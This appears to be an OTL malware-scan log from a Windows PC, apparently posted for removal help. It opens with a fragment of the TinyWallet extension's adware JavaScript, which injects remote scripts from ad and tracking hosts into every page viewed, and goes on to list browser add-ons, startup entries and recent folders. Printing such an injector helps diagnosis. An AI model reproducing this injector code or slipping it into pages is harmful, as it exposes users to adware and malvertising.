a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=1089_11214&hid=4273800016501002566&bname=TinyWallet\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=13702660&ext=TinyWallet&systemid=4273800016501002566&ext=TinyWallet\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=13702660&ext=TinyWallet&systemid=4273800016501002566&ext=TinyWallet\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/wpgb.js?bname=TinyWallet&subid=1089_11214\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=1089_11214&appname=TinyWallet\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;try{new function() {if (!document.getElementById(\"sdfgdfg43iddfhgfs43af\") && window.self == window.top && document.getElementsByTagName(\"body\").length ) {var a = document.createElement(\"script\");a.setAttribute(\"id\", \"sdfgdfg43iddfhgfs43af\");a.src = \"https://www.tr553.com/InterYield/bindevent.do?e=click&affiliate=wpop&subid=1089_11214&ecpm=0&debug=false&snoozeMinutes=3&adCountIntervalHours=24&maxAdCountsPerInterval=3&attributionTitle=TinyWallet&endpoint=https%3A%2F%2Fwww.tr553.com\";document.getElementsByTagName(\"body\")[0].appendChild(a)}};}catch(e){}\r\n})();}catch(e){}");
FF - prefs.js..extensions.enabledAddons: 2020Player_IKEA%402020Technologies.com:5.0.94.1
FF - prefs.js..extensions.enabledAddons: %7Bab91efd4-6975-4081-8552-1b3922ed79e2%7D:1.0.28.1
FF - prefs.js..extensions.enabledAddons: %7B6e7f6f9f-8ce6-4611-add2-05f0f7049ee6%7D:1.10.0.1
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:34.0.5
 
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_206.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect_x86_64: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll ()
FF - HKLM\Software\MozillaPlugins\@alibaba.com/nptrademanager;version=1.0: C:\Program Files (x86)\TradeManager\nptrademanager.dll ( )
FF - HKLM\Software\MozillaPlugins\@alibaba.com/npwangwang;version=1.0: C:\Program Files (x86)\TradeManager\npwangwang.dll ( )
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf: C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf: C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@logitech.com/HarmonyRemote,version=1.0.0: C:\Program Files (x86)\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll (Logitech Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@oberon-media.com/ONCAdapter: C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.14\npapicomadapter.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
FF - HKCU\Software\MozillaPlugins\@alibaba.com/npAliSSOLogin;version=1.0: C:\Program Files (x86)\TradeManager\npAliSSOLogin.dll (Alibaba software (Shanghai) Corporation.)
FF - HKCU\Software\MozillaPlugins\@alibaba.com/nptrademanager;version=1.0: "C:\Program Files (x86)\TradeManager\nptrademanager.dll" File not found
FF - HKCU\Software\MozillaPlugins\@alibaba.com/npwangwang;version=1.0: "C:\Program Files (x86)\TradeManager\npwangwang.dll" File not found
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2012/03/13 07:20:59 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}: C:\Program Files (x86)\Mozilla Firefox\extensions\{6e7f6f9f-8ce6-4611-add2-05f0f7049ee6}
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/12/09 08:42:26 | 000,000,000 | ---D | M]
 
[2013/08/31 10:05:10 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BR\AppData\Roaming\Mozilla\Extensions
[2014/12/24 16:26:26 | 000,000,000 | ---D | M] (No name found) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions
[2013/09/29 00:32:58 | 000,000,000 | ---D | M] (HP Detect) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2}
[2013/09/19 13:33:32 | 000,000,000 | ---D | M] (20-20 3D Viewer - IKEA) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/12/24 16:26:26 | 000,000,000 | ---D | M] (TinyWallet) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/11/20 08:40:53 | 000,000,000 | ---D | M] (iCloud Bookmarks) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/06/14 07:32:55 | 001,999,100 | ---- | M] () (No name found) -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\extensions\[email protected]
[2014/06/05 04:25:52 | 000,006,057 | ---- | M] () -- C:\Users\BR\AppData\Roaming\Mozilla\Firefox\Profiles\acm539rf.default\searchplugins\bingp.xml
[2014/12/24 16:37:46 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/06/05 04:25:46 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/12/09 09:15:02 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2013/03/26 17:52:44 | 000,087,568 | ---- | M] ( ) -- C:\Program Files (x86)\mozilla firefox\plugins\nptrademanager.dll
[2013/03/26 17:52:46 | 000,087,568 | ---- | M] ( ) -- C:\Program Files (x86)\mozilla firefox\plugins\npwangwang.dll
 
========== Chrome  ==========
 
CHR - plugin: Error reading preferences file
CHR - Extension: Google Slides = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.8_0\
CHR - Extension: Google Docs = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\
CHR - Extension: Google Docs = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\
CHR - Extension: Google Docs = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\
CHR - Extension: Google Drive = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Google Drive = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: YouTube = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: YouTube = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: YouTube = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\
CHR - Extension: Google Search = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: Google Search = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Google Search = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\
CHR - Extension: Google Sheets = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.0_0\
CHR - Extension: No name found = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\llhlggpfgfhboddiaobbadofpaoamana\1.0\
CHR - Extension: Google Wallet = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\
CHR - Extension: Google Wallet = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: MyHarmony Chrome Plugin = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\omaonpoimgkmbllpdihbnmgphjoipdhf\1.2.0.0_0\
CHR - Extension: Gmail = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
CHR - Extension: Gmail = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
CHR - Extension: Gmail = C:\Users\BR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\
 
O1 HOSTS File: ([2014/01/25 06:35:52 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1       localhost
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Microsoft Live Search Toolbar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (Microsoft Live Search Toolbar) - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.)
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [FAHConsole] C:\Program Files\File Association Helper\FAHConsole.exe (Nico Mak Computing)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [LogMeIn GUI] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" File not found
O4:[b]64bit:
- HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [XeroxEndeavorBackgroundTask] C:\Windows\SysNative\xrWCbgnd.dll (Xerox Corporation)
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [Adobe Creative Cloud] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [DriveUtilitiesHelper] C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe (Western Digital Technologies, Inc.)
O4 - HKLM..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe File not found
O4 - HKLM..\Run: [WD Drive Unlocker] C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe (Western Digital Technologies, Inc.)
O4 - HKLM..\Run: [WD Quick View] C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe (Western Digital Technologies, Inc.)
O4 - HKLM..\Run: [Wondershare Helper Compact.exe] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Wondershare)
O4 - HKCU..\Run: [052B6A76D3592F59F21802FFF2A3D98838477D09._service_run] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=service File not found
O4 - HKCU..\Run: [Akamai NetSession Interface] C:\Users\BR\AppData\Local\Akamai\netsession_win.exe (Akamai Technologies, Inc.)
O4 - HKCU..\Run: [aliim] C:\Program Files (x86)\TradeManager\AliIM.exe (Alibaba (China) Co., Ltd.)
O4 - HKCU..\Run: [ApplePhotoStreams] C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.)
O4 - HKCU..\Run: [HitsBlender] C:\Program Files (x86)\HitsBlender\hitsblender.exe ()
O4 - HKCU..\Run: [HP Officejet Pro 8620 (NET)] C:\Program Files\HP\HP Officejet Pro 8620\Bin\ScanToPCActivationApp.exe (Hewlett-Packard Development Company, LP)
O4 - HKCU..\Run: [iCloudDrive] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe (Apple Inc.)
O4 - HKCU..\Run: [iCloudServices] C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 3
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O9:[b]64bit:
- Extra Button: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9:[b]64bit:
- Extra 'Tools' menuitem : HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9 - Extra Button: HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : HP Smart Print - {22CC3EBD-C286-43aa-B8E6-06B115F74162} - C:\Program Files (x86)\Hewlett-Packard\Smart Print\SmartPrintSetup.exe (Hewlett-Packard)
O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKCU\..Trusted Domains: alipay.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: alipay.com ([]https in Trusted sites)
O15 - HKCU\..Trusted Domains: alisoft.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: alisoft.com ([]https in Trusted sites)
O15 - HKCU\..Trusted Domains: taobao.com ([]http in Trusted sites)
O15 - HKCU\..Trusted Domains: taobao.com ([]https in Trusted sites)
O16 - DPF: {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds...ransferCtrl.cab (DLC Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 64.59.144.16 64.59.150.132
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{975E2597-4892-450D-9E49-5CA092C4B97F}: DhcpNameServer = 64.59.144.16 64.59.150.132
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{975E2597-4892-450D-9E49-5CA092C4B97F}: NameServer = 208.69.150.250,208.69.150.252
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A8A07555-0EF1-4315-8F87-711544AA5BDA}: NameServer = 208.69.150.250,208.69.150.252
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BC556D6E-E0DC-496A-82C9-E12641CD952E}: DhcpNameServer = 192.168.0.2
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BC556D6E-E0DC-496A-82C9-E12641CD952E}: NameServer = 208.69.150.250,208.69.150.252
O18:[b]64bit:
- Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\ms-help - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\mso-offdap11 - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:[b]64bit:
- HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/08/27 16:57:20 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O32 - AutoRun File - [2011/11/01 12:39:30 | 000,000,079 | ---- | M] () - F:\autorun.inf -- [ UDF ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:
- HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:
- HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:
- HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/12/25 08:23:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{36ECD5BF-2A83-4EA1-9F2A-1372D52EC2F1}
[2014/12/24 16:36:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\predm
[2014/12/24 16:15:26 | 000,000,000 | ---D | C] -- C:\ProgramData\436c0126c213f27c
[2014/12/24 16:15:15 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Chromatic Browser
[2014/12/24 16:15:14 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Torch
[2014/12/24 16:15:13 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\Comodo
[2014/12/24 16:14:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\hitsblender
[2014/12/24 16:13:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\HitsBlender
[2014/12/24 10:23:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D1D4E566-89C5-4661-8587-D6DA3F967427}
[2014/12/23 14:38:57 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E77F53AB-5CFA-4331-956C-89F6A49FE417}
[2014/12/23 01:33:07 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BCCE8D52-2930-4318-9A56-A0EE74801811}
[2014/12/22 22:26:12 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F6ACB3ED-A8EB-4261-A125-679BE2200DF1}
[2014/12/22 10:12:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{2316A05D-D4E2-4776-AAA8-C916225F95B1}
[2014/12/22 09:30:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{44FA6A8F-D05A-4E14-A8A4-9E824AB036DE}
[2014/12/21 09:09:44 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{328853B6-F344-46E7-811C-47AA890B1249}
[2014/12/20 10:05:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F2C52649-44F5-467B-8A99-E251AEF10909}
[2014/12/20 03:04:01 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{0B6787CF-D8C6-48D0-897B-33F9B1773BAD}
[2014/12/19 10:27:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F09B2DFA-DA99-4A9B-97BD-721FCC82C682}
[2014/12/18 10:14:34 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{40FB4ED4-C216-45AB-A934-9A01052FF0A6}
[2014/12/17 11:42:30 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{6C252B3B-90AF-477B-8B9B-C3CB6A4240B8}
[2014/12/16 21:00:04 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{486DC693-CB7F-4A9C-AB4C-119EAEAD3EA2}
[2014/12/16 08:48:31 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{BD179AF9-9327-4607-BA8F-2E09D6442B43}
[2014/12/15 19:40:20 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{3EC3E9E4-4CEC-4EE4-B929-B6DB842B7DF2}
[2014/12/15 07:38:11 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{95F1AFE4-66B6-4106-AF1F-E3E11FFB541D}
[2014/12/14 09:56:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{097310BC-264E-423E-BBE6-3C0984A7526F}
[2014/12/13 14:39:24 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8DF0A1ED-2752-4C1B-9961-B4961D9AB7C4}
[2014/12/13 09:25:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{A7A4483E-D295-4DEC-9ECA-9BAA997A158C}
[2014/12/12 17:10:22 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F42EF7D8-6D04-4744-85A2-68D0885DE588}
[2014/12/12 10:15:52 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{92389730-EE55-458F-9993-0CC5EAE8DD72}
[2014/12/11 10:53:42 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5181130D-474C-41A2-B058-1F81726AC940}
[2014/12/10 16:46:09 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{5BD4D736-C10B-4BC1-A66A-B22E90D4FF9E}
[2014/12/10 15:45:48 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{C3324AE5-1973-450C-9049-BA3B1DDA1F65}
[2014/12/09 22:31:33 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{D744513F-8905-44B3-AFE8-FBD8F082E66C}
[2014/12/09 08:38:40 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{8745E557-E33E-47E5-80C3-B14966613146}
[2014/12/08 15:39:36 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{E7494A2A-69FF-408C-9493-855166F661D5}
[2014/12/07 23:10:51 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{37789C42-330D-4A1B-8B9F-2A2B553ACC0E}
[2014/12/07 23:09:55 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{04F5D5DE-4566-41A0-9560-4296D7568CE6}
[2014/12/07 08:17:26 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{F632853D-342C-43F3-B48D-0F881466EF47}
[2014/12/07 07:48:05 | 000,000,000 | ---D | C] -- C:\Users\BR\AppData\Local\{54E5AD7A-46AA-4A28-A002-A698C77C9FCE}
